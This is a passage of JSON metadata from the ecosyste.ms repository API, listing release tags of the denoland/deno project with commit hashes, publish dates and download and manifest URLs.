api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F